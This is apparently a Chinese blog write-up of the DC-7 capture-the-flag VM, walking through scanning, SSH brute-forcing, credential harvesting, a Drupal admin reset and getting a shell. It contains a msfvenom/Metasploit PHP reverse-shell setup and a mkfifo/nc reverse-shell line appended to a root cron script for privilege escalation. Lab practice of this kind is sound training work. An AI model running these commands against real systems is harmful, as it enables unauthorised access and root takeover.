IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> DC-7靶机 -> 正文阅读

[PHP知识库]DC-7靶机

环境搭建

下载链接:https://www.five86.com/downloads/DC-7.zip

信息收集

主机发现及端口探测

1.nmap -sP 192.168.124.0/24 ---存活主机探测
2.nmap -A 192.168.124.44	---全面扫描
3.nmap -sS 192.168.124.44 -p 1-65535 ---全端口扫描

在这里插入图片描述
发现22端口,爆破ssh,不成功。

hydra -l root -p /usr/share/wordlists/rockyou.txt -t 3 -vV -e ns ip ssh
nmap --script=ssh-brute 192.168.124.44

目录扫描

在这里插入图片描述

网站banner信息收集

在这里插入图片描述
droopescan扫描drupal,发现默认用户admin

./droopescan scan drupal -u http://192.168.124.44 -e a

在这里插入图片描述

发现CMS是Drupal8,但在漏洞库内没发现漏洞,观察到页面有个作者@DC7USER
google搜索发现推特用户,有一个git源码链接,点击后,在config.php发现数据库账号密码。
在这里插入图片描述
在这里插入图片描述
尝试使用ssh连接,连接成功
在这里插入图片描述
回到根目录,提示有一个邮件,查看发现是一个计划任务,自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,貌似还是root权限执行的,然后发现脚本是www-date和root用户才能调用。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查看脚本
发现Drush和gpg命令,drush可以修改drupal站点用户密码
使用drush修改admin

drush user-password admin --password="123456"

报错,提示应该从一个更functional调用drush
在这里插入图片描述
联想到backups.sh是进入html文件夹下进行的备份,于是进入/html,执行以上命令,更改成功
在这里插入图片描述

反弹shell

在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入.
PHP模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以写一句话木马,用蚁剑反弹shell,也可以直接反弹shell.
我这里用MSF直接生成木马并监听
监听

1.msfconsole -q
2.use exploit/multi/handler
3.set LHOST 192.168.124.26
4.set payload php/meterpreter/reverse_tcp
5.run

生成php代码

msfvenom -p php /meterpreter/reverse_tcp -f raw -o /root/桌面/2.php

将生成的代码粘贴复制到content

在这里插入图片描述
成功返回meterpreter
在这里插入图片描述

提权

www-date和root用户可以修改/opt/scripts/backups.sh,该脚本是root权限执行的计划任务,所以可以利用其提权,但是是计划任务,要等,将反弹shell的代码附加到backups.sh脚本

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh 
nc -lvvp 1234

等待计划任务执行就成,但我没成功。

问题

按理说将/bin/bash写入也可以获得root权限,我是先写的这个,但没成功,后来发现上面那个好像也写不进去了?望大佬指点
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-24 00:17:59  更:2022-03-24 00:18:13 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 15:55:02-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计